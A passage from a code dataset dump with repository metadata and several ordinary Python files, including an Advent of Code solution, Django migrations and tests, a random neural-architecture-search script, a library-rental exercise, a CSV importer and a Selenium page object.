blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f7d65603dd3f63bc17d9e50ed555b8ca6f8b9da6
|
36e3e6a12c71c738ed69da8a45b633a71faa4a3c
|
/src/GenerationNetwork/__init__.py
|
73a6dff105a31784d99f3d6688b0b3ca2242209a
|
[] |
no_license
|
Zynoz/BachelorsThesis
|
2aa4006294a3b74068ce5e80356a00336e539d54
|
9b5289b947f1eab9b22f5129e8fc7c6f578408d2
|
refs/heads/master
| 2022-12-24T15:05:53.890638
| 2020-10-02T18:03:55
| 2020-10-02T18:03:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 101
|
py
|
from src.GenerationNetwork.NetSicianTreble import *
from src.GenerationNetwork.NetSicianBass import *
|
[
"mail@fschoen.com"
] |
mail@fschoen.com
|
f9bf325e6a0aa3973e010946bb13081dc16811a5
|
bd39340f4ba7e0b914f0b6d882f4f93b7bcdc1e2
|
/ficheros.py
|
0800f259f0907c3511a7a015d49520a1b1adeaad
|
[] |
no_license
|
zcrockz/cursopython
|
34b96885b008a1c934c4c36f02d83d1f51996ea2
|
d3e6ce9bde32ee1c011eb0c06f3f48210dcc9c2d
|
refs/heads/master
| 2022-12-23T07:04:06.294268
| 2020-09-11T05:24:43
| 2020-09-11T05:24:43
| 294,600,453
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 739
|
py
|
"""
#ARCHIVOS PLANOS
#1 READLINE()
from io import open
fichero= open('fichero.txt','r')
texto = fichero.readlines()
fichero.close()
print(texto)
#2 WITH DE MANERA AUTOMATICA,
with open ("fichero.txt","r") as fichero:
for linea in fichero:
print(linea)
#APPEND
fichero = open('fichero.txt', "a")
fichero.write('\n otra linea')
fichero.close()
#METODO SEEK(), PUNTERO EN EL FICHERO no retorna nada
fichero = open("fichero.txt","r")
fichero.seek(0) #puntero al inicio
fichero.seek(10) # leemos los 10 caracteres
"""
"""
texto = "una linea de texto \notra linea con texto"
fichero=open('fichero.xml','w')
fichero.write(texto)
fichero.close()
"""
fichero = open("texto.txt","w")
texto = "hola"
fichero.write(texto)
fichero.close
|
[
"cristiancomplete@gmail.com"
] |
cristiancomplete@gmail.com
|
06045a09ed8ec540906e8be66c86fd6af05e456d
|
5e382a50c521e4cd874ed4e94799e5ef062994a1
|
/services/api-server/tests/unit/test_settings.py
|
cfe542f36c4c13532421717b0c97e0858ad7d909
|
[
"MIT"
] |
permissive
|
KZzizzle/osparc-simcore
|
71103bcfb81d6ea90e0ac9529e8f08568685166c
|
981bc8d193f3f5d507e3225f857e0308c339e163
|
refs/heads/master
| 2021-05-25T08:46:52.704734
| 2020-10-07T14:07:34
| 2020-10-07T14:07:34
| 253,747,491
| 0
| 0
|
MIT
| 2020-04-07T09:29:23
| 2020-04-07T09:29:22
| null |
UTF-8
|
Python
| false
| false
| 1,125
|
py
|
# import pytest
import logging
from pprint import pprint
from simcore_service_api_server.core.settings import (
URL,
AppSettings,
BootModeEnum,
PostgresSettings,
WebServerSettings,
)
# bring .env-devel in here
def test_min_environ_for_settings(monkeypatch):
    """AppSettings builds successfully from the minimal required environment."""
    minimal_env = {
        "WEBSERVER_HOST": "production_webserver",
        "WEBSERVER_SESSION_SECRET_KEY": "REPLACE ME with a key of at least length 32.",
        "POSTGRES_HOST": "production_postgres",
        "POSTGRES_USER": "test",
        "POSTGRES_PASSWORD": "test",
        "POSTGRES_DB": "simcoredb",
        "SC_BOOT_MODE": "production",
    }
    for name, value in minimal_env.items():
        monkeypatch.setenv(name, value)
    # NOTE: postgres and webserver settings parse the environment at
    # construction time, so they must be built after the setenv calls.
    settings = AppSettings(postgres=PostgresSettings(), webserver=WebServerSettings())
    pprint(settings.dict())
    assert settings.boot_mode == BootModeEnum.production
    assert settings.loglevel == logging.DEBUG
    assert settings.postgres.dsn == URL(
        "postgresql://test:test@production_postgres:5432/simcoredb"
    )
|
[
"noreply@github.com"
] |
KZzizzle.noreply@github.com
|
9f728d9b27e5d1b18f69b9b3201ca9dbde5c1e1c
|
8deb8e74824a6d529fcdd15f65d049d01944baa5
|
/2021/src/day14.py
|
7d62ed607ee2f324d52c5315f9f1eb881a51e966
|
[] |
no_license
|
levaphenyl/advent_of_code
|
f9d16c421fd2217bc689f54687ee9c5e37ca1c5d
|
53b836b291ff3fcdee9481433bb219a4e9482915
|
refs/heads/master
| 2022-01-13T20:29:23.630021
| 2021-12-27T07:00:38
| 2021-12-27T07:00:38
| 237,289,893
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,702
|
py
|
def polymerize_step(chain, rules):
    """Apply one pair-insertion step: between every adjacent pair of
    elements, insert the element given by ``rules`` for that pair.

    Raises KeyError if a pair has no rule and IndexError for an empty chain
    (same as the original loop-and-concatenate version).
    """
    parts = []
    for left, right in zip(chain, chain[1:]):
        parts.append(left)
        parts.append(rules[left + right])
    # The final element is never the left side of a pair, so append it last.
    parts.append(chain[-1])
    return ''.join(parts)
def count_elems(chain):
    """Return a dict mapping each element of ``chain`` to its frequency.

    The original hand-rolled the counting loop; collections.Counter does the
    same in C. Converted back to a plain dict to keep the return type
    identical for callers comparing with ``==`` against dict literals.
    """
    from collections import Counter
    return dict(Counter(chain))
def polymerize(init, rules, n_steps):
    """Run ``n_steps`` pair-insertion steps starting from ``init``.

    The chain length roughly doubles per step (exponential growth) —
    do not use for n_steps > 20; use the pair-count variant instead.
    """
    result = init
    for _ in range(n_steps):
        result = polymerize_step(result, rules)
    return result
def polymerize_step_opt(pair_cnt, rules):
    """One insertion step over pair counts instead of the explicit chain.

    Each occurring pair AB with rule AB->X is replaced by the pairs AX and
    XB, keeping the counts consistent. The input mapping is not mutated;
    a fresh dict is returned.
    """
    updated = dict(pair_cnt)
    for pair, count in pair_cnt.items():
        if not count:
            continue
        inserted = rules[pair]
        updated[pair] -= count
        updated[pair[0] + inserted] += count
        updated[inserted + pair[1]] += count
    return updated
def count_elems_opt(init, rules, n_steps):
    """Element frequencies after ``n_steps`` insertion steps, using pair
    counts so the cost stays polynomial instead of exponential.

    Counting the first element of every pair counts each element exactly
    once, except the chain's last element, which is added separately.
    """
    pair_cnt = dict.fromkeys(rules, 0)
    for left, right in zip(init, init[1:]):
        pair_cnt[left + right] += 1
    for _ in range(n_steps):
        pair_cnt = polymerize_step_opt(pair_cnt, rules)
    totals = {}
    for pair, cnt in pair_cnt.items():
        if cnt:
            first = pair[0]
            totals[first] = totals.get(first, 0) + cnt
    totals[init[-1]] += 1
    return totals
def load_input(path):
    """Read the puzzle input: first non-blank line is the template chain,
    the remaining 'AB -> C' lines become the insertion-rule dict."""
    with open(path, 'r') as handle:
        # len(r) > 1 drops blank lines (a bare newline has length 1).
        lines = [raw.strip() for raw in handle.readlines() if len(raw) > 1]
    template = lines[0]
    insertion_rules = dict(line.split(' -> ') for line in lines[1:])
    return template, insertion_rules
def print_results(init, rules, part):
    """Print the puzzle answer for ``part`` (1: naive 10 steps, 2: pair
    counts for 40 steps): most-common minus least-common element count."""
    if part == 1:
        count = count_elems(polymerize(init, rules, 10))
    elif part == 2:
        count = count_elems_opt(init, rules, 40)
    spread = max(count.values()) - min(count.values())
    print("Answer for part {} is {}".format(part, spread))
if __name__ == "__main__":
test_init = "NNCB"
test_rules = {
"CH": "B", "HH": "N", "CB": "H", "NH": "C", "HB": "C", "HC": "B",
"HN": "C", "NN": "C", "BH": "H", "NC": "B", "NB": "B", "BN": "B",
"BB": "N", "BC": "B", "CC": "N", "CN": "C",
}
assert polymerize_step(test_init, test_rules) == "NCNBCHB"
assert len(polymerize(test_init, test_rules, 10)) == 3073
assert count_elems_opt(test_init, test_rules, 10) == { 'B': 1749, 'C': 298, 'H': 161, 'N': 865, }
input_path = "data/input-day14.txt"
input_init, input_rules = load_input(input_path)
print_results(input_init, input_rules, 1)
print_results(input_init, input_rules, 2)
|
[
"phenyl@posteo.net"
] |
phenyl@posteo.net
|
953bde92c9319fcdc73628ad4e684e839e89bab1
|
e6f0000d0ee619f041068984c0ee229abfcfe74e
|
/api/migrations/0021_auto_20210401_1101.py
|
1701d1c72754c4a11c8ee2bd600de7bf6476afcd
|
[] |
no_license
|
Harry-Edge/MNO-CRM-Sales-System
|
b79acd57d977aebc7cba2e7bddf6a2b62e60242d
|
f6bff30b1b76fb1843698ae7bc397e03eda6b872
|
refs/heads/main
| 2023-04-23T01:40:25.158243
| 2021-04-21T19:58:29
| 2021-04-21T19:58:29
| 348,847,375
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
# Generated by Django 3.1.2 on 2021-04-01 11:01
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: make Notes.date_created auto-populate on row creation."""

    dependencies = [
        ('api', '0020_auto_20210401_1101'),
    ]

    operations = [
        migrations.AlterField(
            model_name='notes',
            name='date_created',
            field=models.DateField(auto_now_add=True),
        ),
    ]
|
[
"edge.harry@outlook.com"
] |
edge.harry@outlook.com
|
51756cadb86d7b42e6568eca764db78b21230b30
|
3e68f2f7870a53fed7a65ee23d1f5a6dd04bde8c
|
/src/search/randomNAS/random_weight_share.py
|
0a0c898a19df69e1bd3e1697c915055150853e19
|
[
"Apache-2.0"
] |
permissive
|
automl/RobustDARTS
|
a4eba4d0daf83d673101139c34b2cb872dbefd38
|
273b7ce28c9d575f2340fef2e8ce6c02a4232307
|
refs/heads/master
| 2023-05-31T11:33:56.330335
| 2020-07-21T11:08:42
| 2020-07-21T11:08:42
| 203,361,165
| 161
| 40
|
Apache-2.0
| 2020-11-12T16:43:33
| 2019-08-20T11:20:34
|
Python
|
UTF-8
|
Python
| false
| false
| 6,189
|
py
|
import sys
import os
import ast
import shutil
import logging
import codecs
import json
import inspect
import pickle
import argparse
import numpy as np
sys.path.append('../RobustDARTS')
from src.search.randomNAS.darts_wrapper_discrete import DartsWrapper
from src.search.randomNAS.parse_cnn_arch import parse_arch_to_darts
from src import utils
class Rung:
    """One level of the search hierarchy: collects the parent ids and node
    ids of every node in ``nodes`` whose rung matches ``rung``."""

    def __init__(self, rung, nodes):
        self.rung = rung
        members = [node for node in nodes.values() if node.rung == rung]
        self.parents = set(node.parent for node in members)
        self.children = set(node.node_id for node in members)
class Node:
    """A sampled architecture in the search tree."""

    def __init__(self, parent, arch, node_id, rung):
        self.parent = parent
        self.arch = arch
        self.node_id = node_id
        self.rung = rung

    def to_dict(self):
        """Serializable summary; ``objective_val`` is included only once it
        has been set on the instance."""
        summary = {
            'parent': self.parent,
            'arch': self.arch,
            'node_id': self.node_id,
            'rung': self.rung,
        }
        try:
            summary['objective_val'] = self.objective_val
        except AttributeError:
            pass
        return summary
class Random_NAS:
    """Random search with weight sharing over a DARTS-style search space.

    Samples ``B`` architectures one training batch at a time against the
    shared-weight ``model``, periodically checkpointing sampled arms, then
    evaluates fresh random samples to pick the best architecture.
    """
    def __init__(self, B, model, seed, save_dir):
        # B: total number of sample/train-batch iterations for run().
        self.save_dir = save_dir
        self.B = B
        self.model = model
        self.args = model.args
        self.seed = seed
        self.iters = 0
        # node_id -> Node, one entry per architecture sampled so far.
        self.arms = {}
        self.node_id = 0

    def get_arch(self):
        """Sample a new architecture and record it as a rung-0 Node."""
        arch = self.model.sample_arch()
        self.arms[self.node_id] = Node(self.node_id, arch, self.node_id, 0)
        self.node_id += 1
        return arch

    def save(self):
        """Pickle all sampled arms and checkpoint the shared-weight model."""
        to_save = {a: self.arms[a].to_dict() for a in self.arms}
        # Only replace file if save successful so don't lose results of last pickle save
        with open(
            os.path.join(self.save_dir,'results_tmp_{}.pkl'.format(self.args.task_id)),'wb'
        ) as f:
            pickle.dump(to_save, f)
        shutil.copyfile(
            os.path.join(self.save_dir,
                         'results_tmp_{}.pkl'.format(
                             self.args.task_id
                         )), os.path.join(self.save_dir,
                                          'results_{}.pkl'.format(self.args.task_id))
        )
        self.model.save()

    def run(self):
        """Main search loop: train one batch per freshly sampled architecture,
        checkpointing every 500 iterations, then dump the error curves."""
        errors_dict = {'train_acc': [], 'train_loss': [], 'valid_acc': [],
                       'valid_loss': []}
        while self.iters < self.B:
            arch = self.get_arch()
            self.model.train_batch(arch, errors_dict)
            self.iters += 1
            if self.iters % 500 == 0:
                self.save()
            # NOTE(review): this condition is truthy whenever iters is NOT a
            # multiple of report_freq, so in debug mode the loop exits almost
            # immediately — confirm that is the intended debug shortcut.
            if (self.iters % self.args.report_freq) and self.args.debug:
                break
        self.save()
        with codecs.open(os.path.join(self.args.save,
                                      'errors_{}.json'.format(self.args.task_id)),
                         'w', encoding='utf-8') as file:
            json.dump(errors_dict, file, separators=(',', ':'))

    def get_eval_arch(self, rounds=None, n_samples=1000):
        """Evaluate ``n_samples`` random architectures per round and return a
        list with the best (arch, objective) of each round.

        If the model's evaluate() accepts a ``split`` argument, the 10 best
        samples are re-scored on the validation split first.
        """
        #n_rounds = int(self.B / 7 / 1000)
        if rounds is None:
            n_rounds = max(1,int(self.B/10000))
        else:
            n_rounds = rounds
        best_rounds = []
        for r in range(n_rounds):
            sample_vals = []
            for _ in range(n_samples):
                arch = self.model.sample_arch()
                try:
                    ppl, _ = self.model.evaluate(arch)
                except Exception as e:
                    # Failed evaluations are ranked last via a huge objective.
                    ppl = 1000000
                logging.info(arch)
                logging.info('objective_val: %.3f' % ppl)
                sample_vals.append((arch, ppl))
            sample_vals = sorted(sample_vals, key=lambda x:x[1])
            full_vals = []
            # NOTE(review): inspect.getargspec is removed in Python 3.11;
            # getfullargspec/signature is the modern replacement.
            if 'split' in inspect.getargspec(self.model.evaluate).args:
                for i in range(10):
                    arch = sample_vals[i][0]
                    try:
                        ppl, _ = self.model.evaluate(arch, split='valid')
                    except Exception as e:
                        ppl = 1000000
                    full_vals.append((arch, ppl))
                full_vals = sorted(full_vals, key=lambda x:x[1])
                logging.info('best arch: %s, best arch valid performance: %.3f' % (' '.join([str(i) for i in full_vals[0][0]]), full_vals[0][1]))
                best_rounds.append(full_vals[0])
            else:
                best_rounds.append(sample_vals[0])
        return best_rounds
def main(wrapper):
    """Drive the random-NAS search for the given DartsWrapper and return the
    best architecture (parsed into DARTS genotype form).

    Also writes the architecture to ``args.save/arch_<task_id>`` and records
    it in the YAML results file.
    """
    args = wrapper.args
    model = wrapper.model
    save_dir = args.save
    # Best-effort resume: a missing checkpoint is only printed, not fatal.
    try:
        wrapper.load()
        logging.info('loaded previously saved weights')
    except Exception as e:
        print(e)
    logging.info("param size = %fMB", utils.count_parameters_in_MB(model))
    logging.info('Args: {}'.format(args))
    if args.eval_only:
        assert save_dir is not None
    # Budget B = number of training batches over all epochs
    # (data_size/time_steps are fixed constants for this setup).
    data_size = 25000
    time_steps = 1
    B = int(args.epochs * data_size / args.batch_size / time_steps)
    searcher = Random_NAS(B, wrapper, args.seed, save_dir)
    logging.info('budget: %d' % (searcher.B))
    if not args.eval_only:
        searcher.run()
        archs = searcher.get_eval_arch(args.randomnas_rounds, args.n_samples)
    else:
        # Evaluation-only mode: reseed and just score 2 rounds of samples.
        np.random.seed(args.seed+1)
        archs = searcher.get_eval_arch(2)
    logging.info(archs)
    #arch = ' '.join([str(a) for a in archs[0][0]])
    # archs[0] is (arch, objective) of the first round; take the arch part.
    arch = str(archs[0][0])
    arch = parse_arch_to_darts('cnn', ast.literal_eval(arch), args.space)
    with open(os.path.join(args.save, 'arch_{}'.format(args.task_id)),'w') as f:
        f.write(str(arch))
    logging.info(str(arch))
    utils.write_yaml_results(args, args.results_file_arch, str(arch))
    return arch
if __name__ == "__main__":
wrapper = DartsWrapper()
log_format = '%(asctime)s %(message)s'
logging.basicConfig(stream=sys.stdout, level=logging.INFO,
format=log_format, datefmt='%m/%d %I:%M:%S %p')
fh = logging.FileHandler(os.path.join(wrapper.args.save,
'log_{}.txt'.format(wrapper.args.task_id)))
fh.setFormatter(logging.Formatter(log_format))
logging.getLogger().addHandler(fh)
main(wrapper)
|
[
"zelaa@informatik.uni-freiburg.de"
] |
zelaa@informatik.uni-freiburg.de
|
2ed35fca7f0d379ca0e89886d81d2931ecca5101
|
42586f5b29fd342271deb650d723c10830b03c0e
|
/calculator.spec
|
a6a5b97dbcef637a13035cc85a681d6ddd9ec341
|
[] |
no_license
|
JFelipeFloresS/Python-Calculator
|
00ce2a31ec9048a0b73d7ef67046c65a6e4c6279
|
b7af55c5a34bf5bcba744656680bae8f86fc913b
|
refs/heads/main
| 2023-07-21T07:29:12.826868
| 2021-08-26T21:11:42
| 2021-08-26T21:11:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 905
|
spec
|
# -*- mode: python ; coding: utf-8 -*-
# PyInstaller build specification for the calculator app.
# Run with: pyinstaller calculator.spec
block_cipher = None

# Analysis: scan calculator.py and collect its imports/binaries/data files.
a = Analysis(['calculator.py'],
             pathex=['C:\\Users\\josef\\Python\\calculator'],
             binaries=[],
             datas=[],
             hiddenimports=[],
             hookspath=[],
             runtime_hooks=[],
             excludes=[],
             win_no_prefer_redirects=False,
             win_private_assemblies=False,
             cipher=block_cipher,
             noarchive=False)
# PYZ: the compressed archive of pure-Python modules.
pyz = PYZ(a.pure, a.zipped_data,
          cipher=block_cipher)
# EXE: one-file executable; console=False means a GUI app (no terminal window).
exe = EXE(pyz,
          a.scripts,
          a.binaries,
          a.zipfiles,
          a.datas,
          [],
          name='calculator',
          debug=False,
          bootloader_ignore_signals=False,
          strip=False,
          upx=True,
          upx_exclude=[],
          runtime_tmpdir=None,
          console=False )
|
[
"noreply@github.com"
] |
JFelipeFloresS.noreply@github.com
|
98152e114c929c369e451133a04e7c01ff4ce349
|
7c5df08cb53de6bd3746198dad87e79f8a9231cc
|
/library/main.py
|
27f79319bcd0723ad69a15d86d2e62719ea78aaa
|
[
"MIT"
] |
permissive
|
JessyLeal/fundamentals-of-computational-issues
|
bd9e20f3d6532d03433c1f056ba85e999cc05cf4
|
e8f0205089b153cae89fa4ef9659984fab7cf1d8
|
refs/heads/main
| 2023-08-29T16:12:41.556459
| 2021-11-12T01:25:01
| 2021-11-12T01:25:01
| 427,194,703
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,873
|
py
|
class Livro:
    """A library book; tracks how many times it has been rented."""

    # Class-level defaults, kept from the original definition.
    codigo = None
    nome = None
    autor = None
    # Private rental counter (name-mangled to _Livro__qtdeAlugueis).
    __qtdeAlugueis = 0

    def __init__(self, codigo, nome, autor):
        self.codigo = codigo
        self.nome = nome
        self.autor = autor

    def incrementaAluguel(self):
        """Record one more rental of this book."""
        self.__qtdeAlugueis = self.__qtdeAlugueis + 1

    def getQtdeAlugueis(self):
        """Return how many times this book has been rented."""
        return self.__qtdeAlugueis
class Biblioteca:
    """In-memory library: books split between rented and available lists.

    NOTE(review): ``alugados`` and ``disponiveis`` are class attributes, so
    every Biblioteca instance shares the same two lists — confirm that a
    single shared library is intended.
    """
    alugados = []
    disponiveis = []

    def inserir(self, livro):
        # Register a new book as available for rental.
        self.disponiveis.append(livro)

    def alugar(self, livro):
        # Rent ``livro`` if it is available; returns (ok, mensagem).
        ok = True
        mensagem = None
        if livro in self.disponiveis:
            for i in self.disponiveis:
                if i == livro:
                    i.incrementaAluguel()
                    self.alugados.append(i)
                    self.disponiveis.remove(i)
                    break
        elif livro in self.alugados:
            ok = False
            mensagem = "O livro ja esta alugado, infelizmente voce nao podera alugar"
        else:
            ok = False
            mensagem = "O livro nao existe"
        return (ok, mensagem)

    def devolver(self, codLivro):
        # Return the rented book whose codigo matches; (ok, mensagem).
        ok = True
        mensagem = None
        for livro in self.alugados:
            if livro.codigo == codLivro:
                self.disponiveis.append(livro)
                self.alugados.remove(livro)
                break
        else:
            # for/else: loop finished without a matching rented book.
            ok = False
            mensagem = "O livro nao esta alugado"
        return (ok, mensagem)

    def livroMaisAlugado(self):
        # Report the most-rented title across both lists; (ok, mensagem).
        ok = True
        mensagem = None
        maior = 0
        nome = None
        for livro in self.disponiveis:
            if livro.getQtdeAlugueis() > maior:
                maior = livro.getQtdeAlugueis()
                nome = livro.nome
        for livro in self.alugados:
            if livro.getQtdeAlugueis() > maior:
                maior = livro.getQtdeAlugueis()
                nome = livro.nome
        if maior == 0:
            ok = False
            mensagem = "Nenhum livro foi alugado ainda"
        else:
            mensagem = "O livro mais alugado e: %s (%d alugueis)"%(nome, maior)
        return (ok, mensagem)

    def livrosOrdenadosPeloNome(self):
        # Bubble-sorts both lists in place by book name, then merges them,
        # printing and collecting book codes.
        listas = [self.disponiveis, self.alugados]
        lista_geral = []
        for l in listas:
            troca = True
            while troca:
                p = len(l)-1
                troca = False
                for i in range(p):
                    if l[i].nome>l[i+1].nome:
                        l[i], l[i+1]= l[i+1], l[i]
                        troca = True
        i= 0
        j = 0
        while True:
            # NOTE(review): the merge below compares Livro objects with `<`
            # even though Livro defines no __lt__ (TypeError on Python 3 when
            # both lists are non-empty), and indexes self.alugados[j] even
            # when both lists are empty — confirm intended behavior.
            if i==len(self.disponiveis):
                for n in range(self.alugados.index(self.alugados[j]), len(self.alugados)-self.alugados.index(self.alugados[j])):
                    print(self.alugados[n].codigo, end=' ')
                    lista_geral.append(self.alugados[n].codigo)
                break
            elif j == len(self.alugados):
                for n in range(self.disponiveis.index(self.disponiveis[i]), len(self.disponiveis)-self.disponiveis.index(self.disponiveis[i])):
                    print(self.disponiveis[n].codigo, end=' ')
                    lista_geral.append(self.disponiveis[n].codigo)
                break
            if self.disponiveis[i]<self.alugados[j]:
                lista_geral.append(self.disponiveis[i].codigo)
                i+=1
            else:
                lista_geral.append(self.alugados[j].codigo)
                j+=1
class Main:
    # NOTE(review): this "class" is used as a script — the whole body runs
    # (including input()) when the class statement executes at import time.
    b = Biblioteca()
    # First CSV field is the number of books; the rest are flat
    # (codigo, nome, autor) triples.
    q_l, *v = input().split(',')
    j = 0
    for livro in range(int(q_l)):
        lv = Livro(v[j], v[j+1], v[j+2])
        b.inserir(lv)
        # NOTE(review): advancing by int(q_l) only reads consecutive triples
        # when q_l == 3; this looks like it should be ``j += 3`` — confirm.
        j+=int(q_l)
    b.livrosOrdenadosPeloNome()
|
[
"62772815+Jessy777-cripto@users.noreply.github.com"
] |
62772815+Jessy777-cripto@users.noreply.github.com
|
0efeca2feec967be8b2bcea5ed884d35c8b46fb3
|
ef293870ea7bab63360db830e4c2fd830c3f865e
|
/src/web/sb/healthworker/datasets/0004_import_dmo_list.py
|
b3cf43d491efad5c45fc3045415762e173684975
|
[
"Apache-2.0"
] |
permissive
|
fugitspace/switchboard-hwr
|
bd140fbe836db36b323241e12117591254c090d2
|
f108096e885d053c277138516a8f292be22fcb5c
|
refs/heads/master
| 2023-01-14T20:48:23.262319
| 2018-07-24T21:33:48
| 2018-07-24T21:33:48
| 59,547,567
| 0
| 0
| null | 2022-12-26T20:12:19
| 2016-05-24T06:46:31
|
Python
|
UTF-8
|
Python
| false
| false
| 1,808
|
py
|
import datetime
import re
from django.db import transaction
from sb.healthworker.datasets import _helpers
from sb.healthworker.models import DMORegistration
# Useful during testing
def remove_unlinked_registration_entries():
    """Delete every DMORegistration row not linked to a health worker
    (useful during testing to allow clean re-imports)."""
    DMORegistration.objects.filter(health_worker__isnull=True).delete()
def parse_registration_number(reg_number):
    """Split a raw registration number into (type letter, normalized number).

    A trailing alphabetic character is treated as the registration type;
    leading zeros/dashes and trailing dashes are stripped from the number.
    Falsy input (None, "") is returned unchanged with a None type.
    """
    if not reg_number:
        return None, reg_number
    reg_type = None
    if reg_number[-1].isalpha():
        reg_type = reg_number[-1]
        reg_number = reg_number[:-1]
    return reg_type, reg_number.lstrip('-0').rstrip('-')
def parse_phone_number(phone_number):
    """Prefix a local number with Tanzania's +255 country code.

    Falsy input (None, "") yields None.
    """
    if not phone_number:
        return None
    return "+255%s" % phone_number
def import_new_entry(item):
    """Create and save one DMORegistration from a CSV row dict.

    Rows with no name component at all are skipped silently. Keys are the
    CSV column headers (FirstName, MiddleName, LastName, Vodacom, RegNo, ...).
    The input dict is normalized in place (values stripped of whitespace).
    """
    # Strip all values of leading and trailing whitespace
    for k,v in item.items():
        if item[k] is not None:
            item[k] = v.strip()
    worker = DMORegistration()
    # Ignore records with no name; filter(bool, ...) drops empty/None parts.
    worker.name = ' '.join(filter(bool, [item["FirstName"], item["MiddleName"], item["LastName"]]))
    if not worker.name:
        return
    worker.phone_number = parse_phone_number(item["Vodacom"])
    worker.registration_type, worker.registration_number = parse_registration_number(item["RegNo"])
    worker.cadre = item["Cadre"]
    worker.check_number = item["CNO"]
    worker.email = item["Email"]
    worker.city = item["City"]
    worker.district = item["District"]
    worker.region = item["Region"]
    worker.nationality = item["Nationality"]
    worker.gender = item["Gender"]
    worker.duty_station = item["DutyStation"]
    worker.department = item["Dep"]
    worker.save()
def run():
    """Import the DMO list CSV into DMORegistration rows as one transaction."""
    path = _helpers.get_path('dmo_list_11Feb13.csv')
    rows = _helpers.read_csv(path)
    # commit_on_success is the pre-Django-1.6 transaction API: the purge and
    # all inserts commit together or not at all.
    with transaction.commit_on_success():
        remove_unlinked_registration_entries()
        for row in rows:
            import_new_entry(row)

if __name__ == '__main__':
    run()
|
[
"matt@mattolson.com"
] |
matt@mattolson.com
|
5027bbd50a923f67f2911eaf9e9b64d9590dcce9
|
334dea3e7941871a6b23be65cfc9b14d6be49db0
|
/apps/master/migrations/0021_auto_20210517_0801.py
|
750fac77228cec5521a93a3cee4cabac8893d014
|
[] |
no_license
|
HilmiZul/walikelas
|
e2f3d06dfab3ab48373eda2b1b363fe1e64caef6
|
3febaf97272c78310e488c883a9647b269e25930
|
refs/heads/master
| 2023-08-15T20:56:58.011519
| 2021-10-07T04:32:43
| 2021-10-07T04:32:43
| 367,083,389
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 462
|
py
|
# Generated by Django 2.2.17 on 2021-05-17 01:01
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: restrict Mapel.kelompok to the fixed A/B/C1-C3 choices."""

    dependencies = [
        ('master', '0020_auto_20210517_0756'),
    ]

    operations = [
        migrations.AlterField(
            model_name='mapel',
            name='kelompok',
            field=models.CharField(choices=[('A', 'A'), ('B', 'B'), ('C1', 'C1'), ('C2', 'C2'), ('C3', 'C3')], max_length=2),
        ),
    ]
|
[
"netspytux@gmail.com"
] |
netspytux@gmail.com
|
974e18935422ce086a0fd7dbddf9153acef4abb3
|
62e86a54b7d676ba024bcd3b422206a6c7fac91f
|
/normdist.py
|
df4888729ffe152df0b752d5e92413fe9c9ead39
|
[] |
no_license
|
M4573R/ml-algorithms-simple
|
76a1db5c274763f43eea0c60ec8f5176d8e9ef0c
|
b5534c7c797795b4111631bf623e1e5e890864ef
|
refs/heads/master
| 2021-01-18T04:47:35.720933
| 2015-09-25T15:13:19
| 2015-09-25T15:13:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 593
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
def main():
    """Sample two 2-D normal distributions and scatter-plot them together."""
    # NOTE(review): [[4, 0], [30, 100]] is not symmetric (nor is
    # [[10, 3], [0, 20]]); numpy warns for invalid covariance matrices,
    # so the plotted distributions may not be what was intended — confirm.
    sample_a = np.random.multivariate_normal([1, 1], [[4, 0], [30, 100]], 1000)
    sample_b = np.random.multivariate_normal([-10, 20], [[10, 3], [0, 20]], 1000)
    for sample, color, label in (
        (sample_a, 'r', '$dist_1$'),
        (sample_b, 'b', '$dist_2$'),
    ):
        plt.scatter(sample[:, 0], sample[:, 1], color=color, marker='x',
                    label=label)
    plt.show()

if __name__ == '__main__':
    main()
|
[
"satojkovic@gmail.com"
] |
satojkovic@gmail.com
|
fe521dcce97257444e00a38add86e76f6f0c0b38
|
e72e75205ad2d0342c49eb0d1970586b81a69257
|
/testscripts/NavigationPage/test_news.py
|
2849c0d3cc298e48fe06c32ad1d1fd110fe223d7
|
[] |
no_license
|
andromedaD/AutoWeb
|
c421f6bf9da69ca251bec6c3d0dd403bb7811245
|
a696ae49af4b9a72b30d89f0acdc6756b2c720ba
|
refs/heads/master
| 2020-04-11T14:37:57.999380
| 2019-01-09T03:54:47
| 2019-01-09T03:54:47
| 161,740,598
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,262
|
py
|
# -*- coding:UTF-8 -*-
import unittest
from testscripts.Login.test_login import Login
from action.driver import *
from util.log_print import *
from util.myunit import StartEnd
from test_data.testdata import testDataInfo
class NewsPage(Login):
    """Page object for the news section, reached after login."""
    url='/'

    def load_master_page(self, type, el_loc):
        """Click the news entry in the master navigation."""
        element = self.find_element_(type, el_loc)
        self.click_(element)

    def load_part_page(self, type, el_loc, status):
        """Click the sub-tab at index ``status``; returns all matched elements."""
        elements = self.find_elements_(type, el_loc)
        self.click_(elements[status])
        return elements

